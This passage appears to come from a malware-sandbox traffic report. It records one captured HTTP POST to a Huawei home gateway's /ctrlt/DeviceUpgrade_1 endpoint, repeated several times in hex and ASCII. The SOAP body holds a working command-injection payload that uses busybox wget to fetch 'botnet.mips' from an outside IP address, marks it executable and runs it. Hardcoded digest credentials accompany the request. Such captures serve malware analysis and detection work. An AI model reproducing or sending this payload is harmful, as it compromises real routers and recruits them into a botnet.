/tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
